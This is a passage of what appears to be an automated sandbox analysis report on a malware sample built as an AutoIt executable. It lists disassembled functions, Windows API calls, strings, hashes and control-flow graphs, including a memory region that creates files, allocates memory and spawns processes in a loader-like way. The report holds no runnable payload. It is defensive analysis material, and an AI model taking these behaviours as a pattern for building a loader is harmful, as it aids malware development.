                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 423443420-4155596026
                                              • Opcode ID: 2b7350e262791321e31ca9fc958aa9d28dac1ae1fea8bf955a15411f7ecdd123
                                              • Instruction ID: a57c9e54dcae05206adb28da18954712e79374d608579767ad6a442d54a90c61
                                              • Opcode Fuzzy Hash: 2b7350e262791321e31ca9fc958aa9d28dac1ae1fea8bf955a15411f7ecdd123
                                              • Instruction Fuzzy Hash: 88213974910308EFEB11DFA4EE49B9E7FB5EB08711F00016AE504BA2A1D3B566508F98

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R@
                                              • API String ID: 1825951767-3808460316
                                              • Opcode ID: 77a7388cd04da4cfa3856b77fb536f765121be4d8d059e1e5dc18fef6cff54c1
                                              • Instruction ID: 99e2acc5d7ba2a504bd428b878c20da48190e3e2b7f579d27c335469d72c7c0b
                                              • Opcode Fuzzy Hash: 77a7388cd04da4cfa3856b77fb536f765121be4d8d059e1e5dc18fef6cff54c1
                                              • Instruction Fuzzy Hash: 01A12C7291021DAACF16EBA4DC95EEEB7B9FF15310F40042AE415BF191DF746A08CB60

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00360162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00360193
                                                • Part of subcall function 00360162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0036019B
                                                • Part of subcall function 00360162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003601A6
                                                • Part of subcall function 00360162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003601B1
                                                • Part of subcall function 00360162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003601B9
                                                • Part of subcall function 00360162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003601C1
                                                • Part of subcall function 003560F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0034F930), ref: 00356154
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0034F9CD
                                              • OleInitialize.OLE32(00000000), ref: 0034FA4A
                                              • CloseHandle.KERNEL32(00000000), ref: 003845C8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                              • String ID: <W@$\T@$%=$S@
                                              • API String ID: 1986988660-3831757665
                                              • Opcode ID: c2d96dec79c104af2e11dc4bea63454cf92e5a7b11c6832678530a6ed6ee99cb
                                              • Instruction ID: 313ea6f997809685061c9951369ce616a3849886897e7fba559b1ebecbc0e22f
                                              • Opcode Fuzzy Hash: c2d96dec79c104af2e11dc4bea63454cf92e5a7b11c6832678530a6ed6ee99cb
                                              • Instruction Fuzzy Hash: 6A81BFB0911A40DFC785EF39AE49B9B7BE5EB88306750813AD418EB372E77448848F1D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1050 1694950-16949a2 call 1694850 CreateFileW 1053 16949ab-16949b8 1050->1053 1054 16949a4-16949a6 1050->1054 1057 16949cb-16949e2 VirtualAlloc 1053->1057 1058 16949ba-16949c6 1053->1058 1055 1694b04-1694b08 1054->1055 1059 16949eb-1694a11 CreateFileW 1057->1059 1060 16949e4-16949e6 1057->1060 1058->1055 1061 1694a13-1694a30 1059->1061 1062 1694a35-1694a4f ReadFile 1059->1062 1060->1055 1061->1055 1064 1694a51-1694a6e 1062->1064 1065 1694a73-1694a77 1062->1065 1064->1055 1067 1694a79-1694a96 1065->1067 1068 1694a98-1694aaf WriteFile 1065->1068 1067->1055 1069 1694ada-1694aff CloseHandle VirtualFree 1068->1069 1070 1694ab1-1694ad8 1068->1070 1069->1055 1070->1055
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01694995
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                              • Instruction ID: bcaded4e2e0dbfae1f50678998e0db0a445838efd7326e3f4e8e01c07c616582
                                              • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                              • Instruction Fuzzy Hash: F6511975A10208FBEF20DFA4CD49FEE7778AF48711F108554FA0AEA284DB749646CB64

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1090 3439d5-343a45 CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00343A03
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00343A24
                                              • ShowWindow.USER32(00000000,?,?), ref: 00343A38
                                              • ShowWindow.USER32(00000000,?,?), ref: 00343A41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 208c17a5ef6ba46f661b39db14d1884826d82dc76a4d4d5b4efc01fca6bfb1c1
                                              • Instruction ID: 4cddf0b51f4a1c5ddd6490b280d254647f40bd5fa17dda66e96a57cc2ac13fdb
                                              • Opcode Fuzzy Hash: 208c17a5ef6ba46f661b39db14d1884826d82dc76a4d4d5b4efc01fca6bfb1c1
                                              • Instruction Fuzzy Hash: 4DF01770500294BEEA2157236C0CE6B2E7EDBC6F50F00407EB904F2160C2751C10CEB4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1443 34407c-344092 1444 34416f-344173 1443->1444 1445 344098-3440ad call 347a16 1443->1445 1448 3440b3-3440d3 call 347bcc 1445->1448 1449 37d3c8-37d3d7 LoadStringW 1445->1449 1451 37d3e2-37d3fa call 347b2e call 346fe3 1448->1451 1453 3440d9-3440dd 1448->1453 1449->1451 1461 3440ed-34416a call 362de0 call 34454e call 362dbc Shell_NotifyIconW call 345904 1451->1461 1465 37d400-37d41e call 347cab call 346fe3 call 347cab 1451->1465 1455 344174-34417d call 348047 1453->1455 1456 3440e3-3440e8 call 347b2e 1453->1456 1455->1461 1456->1461 1461->1444 1465->1461
                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0037D3D7
                                                • Part of subcall function 00347BCC: _memmove.LIBCMT ref: 00347C06
                                              • _memset.LIBCMT ref: 003440FC
                                              • _wcscpy.LIBCMT ref: 00344150
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00344160
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                              • String ID: Line:
                                              • API String ID: 3942752672-1585850449
                                              • Opcode ID: faeb71b64ae831db37e097b12199472217e592ba5fe07bb293b9bca8d507f90d
                                              • Instruction ID: c16aaf4d0bb25f86cf3c57364ca424db892f517e0e2a649c894598f6e60f058b
                                              • Opcode Fuzzy Hash: faeb71b64ae831db37e097b12199472217e592ba5fe07bb293b9bca8d507f90d
                                              • Instruction Fuzzy Hash: 4C318D71008704AFD722EB60DC4AFEB77E8EF44304F20452EF5899A0A1DB74A658CB96

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1478 36541d-365436 1479 365453 1478->1479 1480 365438-36543d 1478->1480 1482 365455-36545b 1479->1482 1480->1479 1481 36543f-365441 1480->1481 1483 365443-365448 call 368b28 1481->1483 1484 36545c-365461 1481->1484 1496 36544e call 368db6 1483->1496 1486 365463-36546d 1484->1486 1487 36546f-365473 1484->1487 1486->1487 1488 365493-3654a2 1486->1488 1489 365475-365480 call 362de0 1487->1489 1490 365483-365485 1487->1490 1494 3654a4-3654a7 1488->1494 1495 3654a9 1488->1495 1489->1490 1490->1483 1493 365487-365491 1490->1493 1493->1483 1493->1488 1498 3654ae-3654b3 1494->1498 1495->1498 1496->1479 1500 36559c-36559f 1498->1500 1501 3654b9-3654c0 1498->1501 1500->1482 1502 3654c2-3654ca 1501->1502 1503 365501-365503 1501->1503 1502->1503 1506 3654cc 1502->1506 1504 365505-365507 1503->1504 1505 36556d-36556e call 370ba7 1503->1505 1507 36552b-365536 1504->1507 1508 365509-365511 1504->1508 1515 365573-365577 1505->1515 1510 3654d2-3654d4 1506->1510 1511 3655ca 1506->1511 1516 36553a-36553d 1507->1516 1517 365538 1507->1517 1513 365513-36551f 1508->1513 1514 365521-365525 1508->1514 1518 3654d6-3654d8 1510->1518 1519 3654db-3654e0 1510->1519 1512 3655ce-3655d7 1511->1512 1512->1482 1522 365527-365529 1513->1522 1514->1522 1515->1512 1523 365579-36557e 1515->1523 1521 3655a4-3655a8 1516->1521 1524 36553f-36554b call 3646e6 call 370e5b 1516->1524 1517->1516 1518->1519 1520 3654e6-3654ff call 370cc8 1519->1520 1519->1521 1536 365562-36556b 1520->1536 1527 3655ba-3655c5 call 368b28 1521->1527 1528 3655aa-3655b7 call 362de0 1521->1528 1522->1516 1523->1521 1526 365580-365591 1523->1526 1539 365550-365555 1524->1539 1532 365594-365596 1526->1532 1527->1496 1528->1527 1532->1500 1532->1501 1536->1532 1540 3655dc-3655e0 1539->1540 1541 36555b-36555e 1539->1541 1540->1512 1541->1511 1542 365560 1541->1542 1542->1536
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                              • String ID:
                                              • API String ID: 1559183368-0
                                              • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                              • Instruction ID: 01cc1000e36f6d3f7ef8eabdaea79b8c94eb07fe16afabe547ecf35df0b08ba4
                                              • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                              • Instruction Fuzzy Hash: A751F630A00B05DBCB278F69C88466E77B6AF41321F25C779F937962D8DB709D508B40
                                              APIs
                                                • Part of subcall function 00344DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344E0F
                                              • _free.LIBCMT ref: 0037E263
                                              • _free.LIBCMT ref: 0037E2AA
                                                • Part of subcall function 00346A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00346BAD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                              • API String ID: 2861923089-1757145024
                                              • Opcode ID: bbb2f7cdc1d7cd303da6163497366afe187bfe615d033ef053d02df8cb173c04
                                              • Instruction ID: b7db576c9d327fcc6f6cf5b1966d69aac9b90d0cf138ad7e7b869475a1a4cee1
                                              • Opcode Fuzzy Hash: bbb2f7cdc1d7cd303da6163497366afe187bfe615d033ef053d02df8cb173c04
                                              • Instruction Fuzzy Hash: 0D916E71910219DFCF16EFA4CC829EDB7B8FF09310B11846AF815AF2A2DB75A945CB50
                                              APIs
                                                • Part of subcall function 01696300: Sleep.KERNELBASE(000001F4), ref: 01696311
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0169653C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CreateFileSleep
                                              • String ID: AZ5KC0NHA85O
                                              • API String ID: 2694422964-2268946937
                                              • Opcode ID: 49a5a048eadd298404188ff5733ac0b074aba741f74b1d6a120deca4f8ba826b
                                              • Instruction ID: ebb8dfb4fd380d14940ac93502bbe32d1963568140387cabe876f7c2e13dab9a
                                              • Opcode Fuzzy Hash: 49a5a048eadd298404188ff5733ac0b074aba741f74b1d6a120deca4f8ba826b
                                              • Instruction Fuzzy Hash: 35519070D14249EBEF11DBA4C815BEEBB79AF54300F004199E609BB2C0DB791B45CBA6
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003435A1,SwapMouseButtons,00000004,?), ref: 003435D4
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003435A1,SwapMouseButtons,00000004,?,?,?,?,00342754), ref: 003435F5
                                              • RegCloseKey.KERNELBASE(00000000,?,?,003435A1,SwapMouseButtons,00000004,?,?,?,?,00342754), ref: 00343617
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 55bb9b9100de5c1241f49691d31da5453977616c824d9726acc3d3927f329b0c
                                              • Instruction ID: de96766eb7374da28f2e1b2bc7a95a09846b954bf061f96a978116487ca974c0
                                              • Opcode Fuzzy Hash: 55bb9b9100de5c1241f49691d31da5453977616c824d9726acc3d3927f329b0c
                                              • Instruction Fuzzy Hash: EF114571614219BFDB229F64DC80EAEBBFDEF04740F128469E805DB210E275AE409BA0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                              • String ID:
                                              • API String ID: 2782032738-0
                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                              • Instruction ID: 4fb870467ac3f892eb32d5d4856a26b373161b8ef3a4b2b368d3a744c5b3c5ea
                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                              • Instruction Fuzzy Hash: 7541F574F00746DBDB1ADFA9C8809AE7BA5EF46360B24C13DE825CB648EB71DD408B50
                                              APIs
                                              • _memset.LIBCMT ref: 003444CF
                                                • Part of subcall function 0034407C: _memset.LIBCMT ref: 003440FC
                                                • Part of subcall function 0034407C: _wcscpy.LIBCMT ref: 00344150
                                                • Part of subcall function 0034407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00344160
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00344524
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00344533
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0037D4B9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                              • String ID:
                                              • API String ID: 1378193009-0
                                              • Opcode ID: 091dc9ba0ec8dc874dae1067af21235dc623ac24a197a4c4769f0d9422732f3e
                                              • Instruction ID: c7ff32ba1e67925bb90fbf37ffc1a28d554dac0232db321b9546ab641df09b84
                                              • Opcode Fuzzy Hash: 091dc9ba0ec8dc874dae1067af21235dc623ac24a197a4c4769f0d9422732f3e
                                              • Instruction Fuzzy Hash: C621C270904784AFEB338B25D895BE7BBECAF06314F0444EDE69E9A181C7747A84CB51
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: AU3!P/=$EA06
                                              • API String ID: 4104443479-3802933467
                                              • Opcode ID: 5a7eb806eeb6cb1aa863566d1b9355fc19560621c19f3d07ddfbc709697a7d9e
                                              • Instruction ID: 8a0a48c8410b0df0d6530bf2bc75d16efe9c0d2ac8e11b4bc35deb78873f26f2
                                              • Opcode Fuzzy Hash: 5a7eb806eeb6cb1aa863566d1b9355fc19560621c19f3d07ddfbc709697a7d9e
                                              • Instruction Fuzzy Hash: FB414C21E0415867DF239B5488917BE7BF6DF47300F288475EC86AF287D624BD4483A2
                                              APIs
                                              • _memset.LIBCMT ref: 0037EA39
                                              • GetOpenFileNameW.COMDLG32(?), ref: 0037EA83
                                                • Part of subcall function 00344750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00344743,?,?,003437AE,?), ref: 00344770
                                                • Part of subcall function 00360791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003607B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen_memset
                                              • String ID: X
                                              • API String ID: 3777226403-3081909835
                                              • Opcode ID: d6f4777a282addaf0753e45c51edbfd591e21012c256af0d0adebc7786dc7976
                                              • Instruction ID: 7bb90effe6df22cb900613162b53f9b471ee3312159c883fc566318f47d00e97
                                              • Opcode Fuzzy Hash: d6f4777a282addaf0753e45c51edbfd591e21012c256af0d0adebc7786dc7976
                                              • Instruction Fuzzy Hash: E021C331A002489BCF539F94C845BEE7BFCAF49714F00805AE508AF241DFB869898FA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __fread_nolock_memmove
                                              • String ID: EA06
                                              • API String ID: 1988441806-3962188686
                                              • Opcode ID: eeacc4cd324213ad3751a55760f90277c5e6e832a784c4566e51770d09626869
                                              • Instruction ID: 76ea34248b154d0411742fdf25950f64fcc001384085ebf75bb5402a1688b915
                                              • Opcode Fuzzy Hash: eeacc4cd324213ad3751a55760f90277c5e6e832a784c4566e51770d09626869
                                              • Instruction Fuzzy Hash: FE01F9718042187EDB19CBA8CC1AEFEBBF8DB11301F00419AF552D6181E975A6048760
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01695075
                                              • ExitProcess.KERNEL32(00000000), ref: 01695094
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355885515.0000000001694000.00000040.00000020.00020000.00000000.sdmp, Offset: 01694000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1694000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Process$CreateExit
                                              • String ID: D
                                              • API String ID: 126409537-2746444292
                                              • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                              • Instruction ID: fe19dcbd0d2593e81a54b03eedc5c148391c9c1b797cc868e76ea8ef7a7ed909
                                              • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                              • Instruction Fuzzy Hash: E9F0EC7294024CABDF60DFE0CC49FEE777CBF04701F008509BA0A9A184DA7896088BA5
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 003A98F8
                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003A990F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 20cb189f165e890caa742136586d450f31f66aa90a818eb7c28f59e7128a12f3
